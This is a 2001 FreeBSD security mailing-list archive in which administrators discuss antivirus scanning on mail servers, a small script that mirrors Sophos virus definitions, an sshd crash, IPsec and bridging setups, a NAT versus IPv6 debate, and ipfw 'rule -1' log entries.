> since. It is running on our mail server (currently FreeBSD v4.2R, was
> 3.0Snap until March 1) and is still available in aout and elf versions.
> They have also added archive scanning inside numerous archive types.
> At the time it was the only major company to have a FreeBSD version (NAI
> was reported to have one but I couldn't track it down). I wrote my own
> script, instead of using Amavis, to work with Sendmail to virus scan.
> Another thing that I've set up is an automatic ide (virus identity)
> download from Sophos. You can ask for automatic email notification when
> they have written a new ide for a new virus (or variant). When that
> email arrives the new ide file is fetched and put into the sweep (their
> virus checking program) directory and used next time it is run (I batch
> my email scanning). Service and support questions have always been
> answered quickly and professionally.
>
> We also use it on all our Win95/98/Me/NT machines - they update themselves
> from a central server that is upgraded manually each month when the CD
> arrives.

There is AVP software at
ftp://downloads1.kaspersky-labs.com/products/avp_unix/freebsd/

Info about the product you can get from: http://www.avp.ru/

The product has the possibility to run in daemon mode (it checks files
sent via a unix domain socket).

> Scott E. Campbell

--
TSB Russian Express, Moscow
Vladimir B. Grebenschikov, vova@express.ru

From owner-freebsd-security Tue Mar 13 10:37:36 2001
Date: Tue, 13 Mar 2001 13:37:35 -0500 (EST)
From: Rob Simmons
Subject: sshd core

I was wondering if someone had a patch for the sshd problem when someone
tries to login with a non-existent account? If so, has it been committed
yet?

Robert Simmons
Systems Administrator
http://www.wlcg.com/

From owner-freebsd-security Tue Mar 13 10:47:23 2001
Message-Id: <5.0.2.1.0.20010313134057.040dfa70@marble.sentex.ca>
Date: Tue, 13 Mar 2001 13:41:06 -0500
To: Rob Simmons,
From: Mike Tancsa
Subject: Re: sshd core

See the open PR.

        ---Mike

At 01:37 PM 3/13/01 -0500, Rob Simmons wrote:
> I was wondering if someone had a patch for the sshd problem when someone
> tries to login with a non-existent account? If so, has it been committed
> yet?
>
> Robert Simmons
> Systems Administrator
> http://www.wlcg.com/

From owner-freebsd-security Tue Mar 13 13:52:10 2001
Date: Tue, 13 Mar 2001 13:52:06 -0800
From: Kris Kennaway
To: Garrett Wollman
Cc: security@FreeBSD.ORG
Subject: Re: rwhod
Message-ID: <20010313135205.A17955@mollari.cthul.hu>
References: <200103122347.f2CNlxT28110@freefall.freebsd.org> <200103131644.LAA73764@khavrinen.lcs.mit.edu>
In-Reply-To: <200103131644.LAA73764@khavrinen.lcs.mit.edu>; from wollman@khavrinen.lcs.mit.edu on Tue, Mar 13, 2001 at 11:44:24AM -0500

On Tue, Mar 13, 2001 at 11:44:24AM -0500, Garrett Wollman wrote:
> < said:
>
> > Remote users can cause the rwhod daemon to crash, denying service to
> > clients.
>
> It's worth noting that most people who run `rwhod' use it only for
> ``tourist information'' anyway and do not actually depend on the
> information it provides. I run it on my servers so that the nightly
> reports will include the summary of uptimes and load averages, but if
> one daemon goes AWOL I'll not be particularly concerned.
>
> If, on the other hand, this bug is actually exploitable, that would be
> much more serious (and would warrant a reissue of the advisory).
Yeah, it's pretty tame..but still worth reporting (instances where daemons
can be remotely induced to crash are a class of bug we report in
advisories, reliability is a component of security, etc :-)

Kris

From owner-freebsd-security Tue Mar 13 13:57:36 2001
Date: Tue, 13 Mar 2001 13:57:41 -0800
From: dannyman
To: James Wyatt
Cc: Will Mitayai Keeso Rowe, freebsd-security@freebsd.org
Subject: Re: Virus Scanning Software for FreeBSD
Message-ID: <20010313135741.I3500@dell.dannyland.org>
In-Reply-To: ; from jwyatt@rwsystems.net on Mon, Mar 12, 2001 at 09:04:02PM -0600

On Mon, Mar 12, 2001 at 09:04:02PM -0600, James Wyatt wrote:
> I have an eval copy of a product that looks promising: Sophos antivirus.
>
> http://www.sophos.com/products/antivirus/savunix.html

I have been using Amavis and Sophos together for a while now. I must say
that Sophos have been good to us.

[...]

> Updates are monthly CDs and urgent updates are available as downloads.

I have a cron that runs every five minutes to grab the latest identities
from their web site. We are very secure against even the trendy virii, and
it is kind of fun to respond to a ticket from a well-meaning user warning
us of a new virus that "we have been scanning for this virus since 9:30AM
yesterday." :)

If anyone wants the script, e-mail me.

> Our intent is to have it go after SMTP, HTTP, and FTP if we can and to
> scan the Samba partitions for file infections. It handles uSoft Office
> products like Word(tm) docs and such.

It can open archives and stuff too. I haven't used Intercheck yet, but
that looks like a very clever idea - your Windows clients contact the unix
server for virus identity updates.

> Best of all, they support FreeBSD so we should support them, right? - Jy@

Amen. They seem pretty successfully multi-platform. Were they truly clever
they'd submit a port so you could eval their software.
:)

-danny

From owner-freebsd-security Tue Mar 13 14:07:43 2001
Message-ID: <3AAE4798.C7C457E4@algroup.co.uk>
Date: Tue, 13 Mar 2001 16:15:20 +0000
From: Adam Laurie
To: Poul-Henning Kamp
Cc: Terje Elde, Daniel Hagan, freebsd-security@FreeBSD.ORG
Subject: Re: iButton Development
References: <7857.984495569@critter>

Poul-Henning Kamp wrote:
>
> My share in this is mostly the monitoring gadgets with the 1wire
> products, but given working software I would probably put my pgp
> key somewhere more safe as well.

the iblab test programs provide enough functionality to do this... a very
simple setup is:

create a new pgp private key for your laptop. use it to encrypt your "real"
pgp keyring/ssh keys/whatever and copy the resulting file to the ibutton.
you only EVER use the new keypair for this purpose. when you need to use
your real key, you copy it back off the ibutton, onto ramdisk, decrypt it,
use it, blow away your ramdisk (all nicely wrapped in a shellscript of
course)...

this way, you can take your laptop and your ibutton on the road with
you... if you lose the ibutton it doesn't matter because it's encrypted
with a one-time throw away key that only exists on your laptop, which you
immediately delete. if you lose your laptop, you've lost a key that was
only ever used to encrypt something on your ibutton which you now overwrite
with a new one.

this assumes, of course, that you've stored your "real" original keys
somewhere *really* safe... deep underground, blast doors, bullet proof
glass, etc. etc... you know the kind of thing.... :)

cheers,
Adam
--
Adam Laurie                   Tel: +44 (20) 8742 0755
A.L. Digital Ltd.
                              Fax: +44 (20) 8742 5995
Voysey House                  http://www.thebunker.net
Barley Mow Passage            http://www.aldigital.co.uk
London W4 4GB                 mailto:adam@algroup.co.uk
UNITED KINGDOM                PGP key on keyservers

From owner-freebsd-security Tue Mar 13 14:07:45 2001
Message-ID: <3AAE2C6C.D06A0E88@algroup.co.uk>
Date: Tue, 13 Mar 2001 14:19:24 +0000
From: Adam Laurie
To: Poul-Henning Kamp
Cc: Daniel Hagan, freebsd-security@FreeBSD.ORG, iblab@aldigital.co.uk
Subject: Re: iButton Development
References: <6940.984490034@critter>

Poul-Henning Kamp wrote:
>
> In message <3AADB1D3.C70E00C@colltech.com>, Daniel Hagan writes:
> > There was some discussion regarding iButtons in mid-Jan on this list.
> > I'm interested in getting one or more of these things to play with, with
> > the goal of:
>
> The best I can suggest you is that we rally all efforts
> around:
> http://anoncvs.aldigital.co.uk/iBLab/
>

we would certainly welcome any input and will incorporate any useful code
back into the project.

cheers,
Adam
--
Adam Laurie                   Tel: +44 (20) 8742 0755
A.L. Digital Ltd.             Fax: +44 (20) 8742 5995
Voysey House                  http://www.thebunker.net
Barley Mow Passage            http://www.aldigital.co.uk
London W4 4GB                 mailto:adam@algroup.co.uk
UNITED KINGDOM                PGP key on keyservers

From owner-freebsd-security Tue Mar 13 15:15:14 2001
Date: Tue, 13 Mar 2001 15:15:12 -0800
From: dannyman
To: freebsd-security@freebsd.org
Subject: Sophos "idefetch" script
Message-ID: <20010313151512.Q3500@dell.dannyland.org>

Wow, got three responses right away asking for my script to fetch updated
IDE files from Sophos' web site. Which it turns out is seven lines of sh,
and now thirty-some lines of Tellme Open Source License. :)

http://www.dannyland.org/~dannyman/warez/idefetch

If you can make it better, please share. ;)

-danny

From owner-freebsd-security Tue Mar 13 15:43:43 2001
Date: Tue, 13 Mar 2001 15:43:49 -0800
From: dannyman
To: freebsd-security@freebsd.org
Subject: Re: Sophos "idefetch" script
Message-ID: <20010313154349.W3500@dell.dannyland.org>
References: <20010313151512.Q3500@dell.dannyland.org>
In-Reply-To: <20010313151512.Q3500@dell.dannyland.org>; from dannyman@toldme.com on Tue, Mar 13, 2001 at 03:15:12PM -0800

Okay ... So, I added a note about how fetch -m means "mirror" but the other
important thing to note is this is just a simple little brain-dead mirror
script, and the true magic comes from http://www.amavis.org/ so you can
scan e-mail. ;)

-danny

From owner-freebsd-security Tue Mar 13 16:04:07 2001
To: dannyman
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Sophos "idefetch" script
References: <20010313151512.Q3500@dell.dannyland.org>
From: Dag-Erling Smorgrav
Date: 14 Mar 2001 01:03:58 +0100
In-Reply-To: dannyman's message of "Tue, 13 Mar 2001 15:15:12 -0800"

dannyman writes:
> http://www.dannyland.org/~dannyman/warez/idefetch
>
> If you can make it better, please share. ;)

Try this on for size:

    idesite="http://www.sophos.com/downloads/ide/"
    idedir="/usr/local/sav"
    fetch="/usr/bin/fetch"
    ${fetch} -q -o - "${idesite}list.txt" | cut -c 37- | while read d ; do
        ${fetch} -m -q -o ${idedir} "${idesite}${d}"
    done

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Tue Mar 13 16:10:21 2001
Date: Tue, 13 Mar 2001 16:10:17 -0800
From: dannyman
To: Dag-Erling Smorgrav
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Sophos "idefetch" script
Message-ID: <20010313161017.Z3500@dell.dannyland.org>
References: <20010313151512.Q3500@dell.dannyland.org>
In-Reply-To: ; from des@ofug.org on Wed, Mar 14, 2001 at 01:03:58AM +0100

On Wed, Mar 14, 2001 at 01:03:58AM +0100, Dag-Erling Smorgrav wrote:
> dannyman writes:
> > http://www.dannyland.org/~dannyman/warez/idefetch
> >
> > If you can make it better, please share. ;)
>
> Try this on for size:
>
> idesite="http://www.sophos.com/downloads/ide/"
> idedir="/usr/local/sav"
> fetch="/usr/bin/fetch"
> ${fetch} -q -o - "${idesite}list.txt" | cut -c 37- | while read d ; do
>     ${fetch} -m -q -o ${idedir} "${idesite}${d}"
> done

DES: Is this addendum to the script okay by you?
;)

    # >>>>>> SNIP HERE IF YOU ARE 31337 <<<<<<
    # If you want, use this from Dag-Erling Smorgrav
    # (You can use the below without including the Tellme license ;)
    #Try this on for size:
    #
    #idesite="http://www.sophos.com/downloads/ide/"
    #idedir="/usr/local/sav"
    #fetch="/usr/bin/fetch"
    #${fetch} -q -o - "${idesite}list.txt" | cut -c 37- | while read d ; do
    #    ${fetch} -m -q -o ${idedir} "${idesite}${d}"
    #done

From owner-freebsd-security Tue Mar 13 16:40:25 2001
To: dannyman
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Sophos "idefetch" script
References: <20010313151512.Q3500@dell.dannyland.org> <20010313161017.Z3500@dell.dannyland.org>
From: Dag-Erling Smorgrav
Date: 14 Mar 2001 01:40:15 +0100
In-Reply-To: dannyman's message of "Tue, 13 Mar 2001 16:10:17 -0800"

dannyman writes:
> Is this addendum to the script okay by you? ;)

Umm, the idea was actually to suggest an improvement on your own
script. If you don't like it, just ignore it.

1) it's conventional to use lowercase names for variables internal to
   the script, and reserve uppercase names for variables passed from
   the shell.

2) you should always take care to wrap variable references in double
   quotes

3) you shouldn't redirect fetch's stderr to /dev/null, use -q to hide
   the status messages

4) your for loop will break if one of the IDEs' name contains funny
   characters; my while loop won't

5) you don't need to cd to ${idedir}, you can ask fetch to put the files
   there for you - though that's mostly a matter of taste

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Tue Mar 13 16:54:28 2001
Date: Tue, 13 Mar 2001 16:54:34 -0800
From: dannyman To: Dag-Erling Smorgrav Cc: freebsd-security@FreeBSD.ORG Subject: Re: Sophos "idefetch" script Message-ID: <20010313165434.B3500@dell.dannyland.org> References: <20010313151512.Q3500@dell.dannyland.org> <20010313161017.Z3500@dell.dannyland.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from des@ofug.org on Wed, Mar 14, 2001 at 01:40:15AM +0100 X-Loop: djhoward@uiuc.edu X-URL: http://www.dannyland.org/~dannyman/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Mar 14, 2001 at 01:40:15AM +0100, Dag-Erling Smorgrav wrote: > dannyman writes: > > Is this addendum to the script okay by you? ;) > > Umm, the idea was actually to suggest an improvement on your own > script. If you don't like it, just ignore it. [...] Ehhh ... great points that I may use in my life. I just like to share enough rope to hang oneself. I try to keep the fetch arguments simple for portability to non-FreeBSD. For a simple for loop, things started getting silly the moment I slapped my company's license on there. And I used the uppercase so some random person checking out the script would see "oh ... I change THAT variable." (Like a #define or something in a Makefile.) I put your version at the bottom as the easy, lightweight, not 40 lines of commentary and license version, as the stuff above, as noted, has gotten silly, and just to make it absolutely clear, that everything we ever need in life, can just be finished with the right six lines of shell script. (Or one well-formed wget command, but I digress.) I hope everyone is happily implementing their respective solutions though.
:) Thanks, -danny -- http://dannyman.toldme.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 18:36: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from cs4.cs.ait.ac.th (cs4.cs.ait.ac.th [192.41.170.16]) by hub.freebsd.org (Postfix) with ESMTP id 269E437B72A for ; Tue, 13 Mar 2001 18:35:55 -0800 (PST) (envelope-from Olivier.Nicole@ait.ac.th) Received: from bazooka.cs.ait.ac.th (on@bazooka.cs.ait.ac.th [192.41.170.2]) by cs4.cs.ait.ac.th (8.9.3/8.9.3) with ESMTP id JAA25986; Wed, 14 Mar 2001 09:35:38 +0700 (GMT+0700) 
From: Olivier Nicole Received: (from on@localhost) by bazooka.cs.ait.ac.th (8.8.5/8.8.5) id JAA25550; Wed, 14 Mar 2001 09:35:46 +0700 (ICT) Date: Wed, 14 Mar 2001 09:35:46 +0700 (ICT) Message-Id: <200103140235.JAA25550@bazooka.cs.ait.ac.th> To: lee@kechara.net Cc: security@FreeBSD.ORG In-reply-to: <200103131841.SAA10089@mailgate.kechara.net> (message from Lee Smallbone on Tue, 13 Mar 2001 17:35:00 -0000) Subject: Re: [OT?] - Central point router Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi Lee, Given that you may have to consider renumbering of the servers, and that you could add a switch behind the FreeBSD router box, it is pretty simple. A PII 500, with 128 MB RAM and 2 GB hard disk (where to find that small disk) can do the trick. If your LAN is only 10M, then a P100 would be enough (I had been operating one for years, upgraded to PIII when we changed the LAN to 100M). You may consider running gated or zebra, though the routing is limited and static could do. It is mainly a problem of setting up the routing (which does not pertain to this list) and opening a few ports on the firewall. One alternative solution I read recently is to use the DUMMY interface on FreeBSD, which allows you to set up a machine that has NO IP address (it is like a sort of HUB) and still have a firewall configured on it (see mail archive less than 5 days ago). That way you avoid routing problems and I believe the machine is even more secure as it is invisible from the Internet. Of course you need a switch to serve your 3 servers.
Olivier To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 20:43:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from shorty.ahpcns.com (joemoore-host.dsl.visi.com [209.98.246.61]) by hub.freebsd.org (Postfix) with ESMTP id 36FAC37B719 for ; Tue, 13 Mar 2001 20:43:50 -0800 (PST) (envelope-from jomor@ahpcns.com) Received: from ahpcns.com (localhost [127.0.0.1]) by shorty.ahpcns.com (Postfix) with ESMTP id 2958A3A715 for ; Tue, 13 Mar 2001 22:43:47 -0600 (CST) Message-ID: <3AAEF702.9AC2715B@ahpcns.com> Date: Tue, 13 Mar 2001 22:43:46 -0600 
From: jomor Organization: ahpcns X-Mailer: Mozilla 4.72 [en] (X11; I; FreeBSD 3.5-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: IPSEC tunnel without gif? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've been setting up a VPN with tunnel mode IPSEC and things are going OK so far but in searching the list archives, I've found some stuff that seems to imply that gif tunnels are not needed for tunnel mode. Is this true? I've only gotten it to work by pre-configuring the gif tunnel, but now I'm not sure if I have true "tunnel mode IPSEC" or "transport mode IPSEC" applied to an "IP-ENCAP" tunnel such as that suggested by the X-bone project. seeking enlightenment ...jgm To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 20:52:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from w2xo.pgh.pa.us (18.gibs5.xdsl.nauticom.net [209.195.184.19]) by hub.freebsd.org (Postfix) with ESMTP id 3E62537B719 for ; Tue, 13 Mar 2001 20:52:15 -0800 (PST) (envelope-from durham@w2xo.pgh.pa.us) Received: from shazam (shazam [192.168.5.3]) by w2xo.pgh.pa.us (8.11.2/8.9.3) with ESMTP id f2E4pcq41853 for ; Wed, 14 Mar 2001 04:51:39 GMT (envelope-from durham@w2xo.pgh.pa.us) Date: Tue, 13 Mar 2001 23:54:01 -0500 (EST) 
From: Jim Durham X-Sender: durham@shazam.int To: freebsd-security@freebsd.org Subject: Sophos and Virus return mail Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Great discussion going on about Sophos and Amavis! This may be something I'm missing, but there are several virii that apparently send no "envelope from" address when they generate virus mail. One that comes to mind is the stupid "Snow White" thing. I went through the Amavis scan script and I see that if there is no "envelope from" address, it punts and sends the warning to "MAILER-DAEMON". This means you get a bazillion of these messages every day (We seem to have employees who appear in the address books of people with this virus!). Also, the person with the virus does not get the warning mail. I thought of rewriting the script to use the "From: " address to reply. I think that would usually work, but I'm not sure that address always appears either. Anyone done anything with this? Thanks, Jim Durham To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 20:57: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.xmission.com (mail.xmission.com [198.60.22.22]) by hub.freebsd.org (Postfix) with ESMTP id DCA1F37B71A for ; Tue, 13 Mar 2001 20:57:04 -0800 (PST) (envelope-from cookfire@xmission.com) Received: from [166.70.183.163] (helo=cook) by mail.xmission.com with smtp (Exim 3.12 #1) id 14d3LM-0003NU-00 for freebsd-security@freebsd.org; Tue, 13 Mar 2001 21:57:04 -0700 Reply-To: 
From: "Craig Chaney" To: Subject: Bridging only 2 interfaces??? Date: Tue, 13 Mar 2001 21:57:35 -0700 Message-ID: <001501c0ac43$49dcfe60$a3b746a6@cook> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have set up a bridging firewall that has 3 interfaces. One of the interfaces is the protected side of the machine, one is the internet side of the machine, and the third is an interface in to my local network for management purposes. Is it possible to set up the machine to bridge just the interfaces not connected to the local network? If so how? Thank you --Craig To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 22:37:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.freebsd-corp-net-guide.com (mail.freebsd-corp-net-guide.com [206.29.169.15]) by hub.freebsd.org (Postfix) with ESMTP id 164B237B71A; Tue, 13 Mar 2001 22:37:48 -0800 (PST) (envelope-from tedm@toybox.placo.com) Received: from tedm.placo.com (nat-rtr.freebsd-corp-net-guide.com [206.29.168.154]) by mail.freebsd-corp-net-guide.com (8.11.1/8.11.1) with SMTP id f2E6ZDN22442; Tue, 13 Mar 2001 22:35:13 -0800 (PST) (envelope-from tedm@toybox.placo.com) 
From: "Ted Mittelstaedt" To: "Bob Van Valzah" Cc: "pW" , , Subject: RE: Racoon Problem & Cisco Tunnel Date: Tue, 13 Mar 2001 22:35:12 -0800 Message-ID: <003d01c0ac50$ec379280$1401a8c0@tedm.placo.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 Importance: Normal In-Reply-To: <3AAE24E6.9080802@Talarian.Com> X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thanks! It's not really a religious war, because there's valid reasons to move to IPv6 and I think it's obvious that ultimately the Internet is going to have to go there. But, what the engineers don't understand is that this is a political problem, not a technical problem. They just see it like the Post Office sees it when they need a new zip code. What they always forget is that there's ways to twist the arms of people that are address space hogs that will force those addresses to be upchucked - thus the "imminent shortage" magically disappears for another 6 months until the next person's arm needs to be twisted. And, there's an incredible number of arms out there that can be twisted. Take some of those large corporations, like SquishySoft, that have entire class A's assigned to them, but firewall the entire address space off from the public Internet, and only allow incoming connections to perhaps 100 of them. Would you like to be the CEO of Squishy when the papers start rolling the story of how this company's completely unjustified hanging-on of this block is preventing another 16 million people from being brought on to the Internet? I agree with you on ISP's needing to hand out public numbers. The ISP I work for hands them out with every account, either work or home, for no extra charge. 
As long as you know what you're doing when you put together your network it's not a problem for the ISP. I've even been known to cut the occasional /29 subnet to people that had justification for it. I only draw the line at the people that want a dozen numbers in the DSL bridge itself and are too cheap to buy a router. But, going beyond a /29 for a small company - that's a different story, and we make people jump through hoops before doing it. Ted Mittelstaedt tedm@toybox.placo.com Author of: The FreeBSD Corporate Networker's Guide Book website: http://www.freebsd-corp-net-guide.com -----Original Message-----
From: Bob Van Valzah [mailto:Bob@Talarian.Com] Sent: Tuesday, March 13, 2001 5:47 AM To: Ted Mittelstaedt Cc: pW; FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG Subject: Re: Racoon Problem & Cisco Tunnel Ted, Loved the book--can't wait for the movie! This is a religious war that's been fought many times before. Since my last answer was too flip, I'll clarify my point of view. IPv4, IPv6, and NAT are all just tools that I have to apply with "business sense." NAT's not inherently evil, nor is IPv6. Their sensibility will change over time and depend upon the application. If I were shopping for DSL for "my mom," I wouldn't care if she got a public address or not. Reliability and good support (as a "little guy" can more often provide) would be more important. But when I'm shopping for DSL for a work-from-home, multicast protocol stack developer, a public address is a requirement. In fact, it's something I'll pay extra to get. For my business, IPSec is important and hence having at least one public address is important. My protocol developers have a few LANs at home and we happily use NAT there. I wouldn't pay extra to get enough address space to put public addresses on all their home lab machines. An ISP who won't give me at least one public address is just limiting where I can apply their service. An ISP who gives me one or more public addresses lets me pick the point at which I want to apply NAT. So in spite of my flip remarks, I hope you can see that I do use NAT--I just put it off to the last minute where it doesn't make business sense to avoid it. Bob Ted Mittelstaedt wrote: -----Original Message----- From: owner-freebsd-questions@FreeBSD.ORG [mailto:owner-freebsd-questions@FreeBSD.ORG] On Behalf Of Bob Van Valzah Sent: Monday, March 12, 2001 8:07 AM To: pW Cc: FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG Subject: Re: Racoon Problem & Cisco Tunnel Yes. The five DSL setups with which I'm familiar all grant at least one public address per house.
I believe all are static, but one might be dynamic. Interference with protocols like IPSec is one of the reasons why I'd make a public address a requirement when choosing a DSL provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all possible. Let's hasten the deployment of IPv6. I'd agree with you if everyone that would have to do a renumber of a large network from IPv4 to IPv6 had Vint Cerf's money. When you're retired like him with money coming out your arse-hole you can afford to make irresponsible statements like that. Unfortunately, what people like him don't understand is that the burden of renumbering the fabric of the Internet from IPv4 to IPv6 will fall largely on people like me - who have thousands of customers and tens of thousands of public IP numbers spread out among all of them - and who don't have the money to support something this audacious. I can almost guarantee that whatever ISP that I am working for when this finally happens is going to go out of business, all it's going to do is put thousands of smaller to medium-sized ISP's into bankruptcy and let people like AOL who have money coming out their arse-holes virtually monopolize Internet access in the world. Until I see the large organizations with Class A's tied up, give up those numbers back to the pool, I'll fight any attempt to move from IPv4 to IPv6, and most other ISP's that are out there are going to fight it as well. In the meantime I'm pushing all my customers into using NAT. NAT is here to stay and people that run around calling it an aberration are just proving to the rest of us that they have absolutely no business sense. NAT has proven itself reliable and vital and idiot engineers that design TCP protocols that assume everyone has a public IP number are just architecting their own failures, and their protocol's subsequent minimizing by the market.
I have some sympathy for protocols like IPSec that came to be during the same time - but organizational-to-organizational IPSec tunnels don't have to pass through the NAT - they can terminate on it. But, anyone doing a new protocol today is a fool if it can't work through a NAT. Ted Mittelstaedt tedm@toybox.placo.com Author of: The FreeBSD Corporate Networker's Guide Book website: http://www.freebsd-corp-net-guide.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 23:20:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 07D6137B71B for ; Tue, 13 Mar 2001 23:20:17 -0800 (PST) (envelope-from cjc@rfx-216-196-73-168.users.reflexcom.com) Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Tue, 13 Mar 2001 23:18:15 -0800 Received: (from cjc@localhost) by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f2E7KFh11046; Tue, 13 Mar 2001 23:20:15 -0800 (PST) (envelope-from cjc) Date: Tue, 13 Mar 2001 23:20:14 -0800
From: "Crist J. Clark" To: Alan Batie Cc: security@FreeBSD.ORG Subject: Re: ipfw rule -1? Message-ID: <20010313232014.B496@cjc-desktop.users.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <20010313084020.A5859@agora.rdrop.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010313084020.A5859@agora.rdrop.com>; from alan@batie.org on Tue, Mar 13, 2001 at 08:40:20AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Mar 13, 2001 at 08:40:20AM -0800, Alan Batie wrote: > I'm seeing a few of these in my ipfw log and was wondering what rule -1 is? > I couldn't find anything about it in the man page... > > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 > > ipfw: -1 Refuse TCP 62.29.124.91:97 199.2.210.241:29540 in via etha16 > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 The manpage does not go as far as to indicate that this is rule -1, but it does say this happens, FINE POINTS o There is one kind of packet that the firewall will always discard, that is a TCP packet's fragment with a fragment offset of one. This is a valid packet, but it only has one use, to try to circumvent firewalls. Rule -1 is given for any packet dropped, but not dropped due to a user rule or the default rule. A quick look at the source indicates the above pseudo-rule and some other fragment issues (bogusfrag) are the only such situations. OK, I've answered this one enough times now. Should I send in a PR with patch to the manpage or is this for the FAQ? -- Crist J.
Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 23:29:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from awww.jeah.net (awww.jeah.net [216.111.239.130]) by hub.freebsd.org (Postfix) with ESMTP id A330437B719 for ; Tue, 13 Mar 2001 23:29:12 -0800 (PST) (envelope-from chris@jeah.net) Received: from localhost (chris@localhost) by awww.jeah.net (8.11.1/8.11.0) with ESMTP id f2E7T0c08415; Wed, 14 Mar 2001 01:29:00 -0600 (CST) (envelope-from chris@jeah.net) Date: Wed, 14 Mar 2001 01:28:59 -0600 (CST) 
From: Chris Byrnes To: Cc: Alan Batie , Subject: Re: ipfw rule -1? In-Reply-To: <20010313232014.B496@cjc-desktop.users.reflexcom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I think it'd be nice to see it in the manpage right underneath the "Fine Point" you pasted. + Chris Byrnes, chris@JEAH.net + JEAH Communications + 1-866-AWW-JEAH (Toll-Free) On Tue, 13 Mar 2001, Crist J. Clark wrote: > On Tue, Mar 13, 2001 at 08:40:20AM -0800, Alan Batie wrote: > > I'm seeing a few of these in my ipfw log and was wondering what rule -1 is? > > I couldn't find anything about it in the man page... > > > > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 > > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 > > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 > > > ipfw: -1 Refuse TCP 62.29.124.91:97 199.2.210.241:29540 in via etha16 > > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 > > The manpage does not go as far as to indicate that this is rule -1, > but it does say this happens, > > FINE POINTS > o There is one kind of packet that the firewall will always discard, > that is a TCP packet's fragment with a fragment offset of one. This > is a valid packet, but it only has one use, to try to circumvent > firewalls. > > Rule -1 is given for any packet dropped, but not dropped due to a user > rule or the default rule. A quick look at the souce indicates the > above pseudo-rule and some other fragment issues (bogusfrag) are the > only such situations. > > OK, I've answered this one enough times now. Should I send in a PR > with patch to the manpage or is this for the FAQ? > -- > Crist J. 
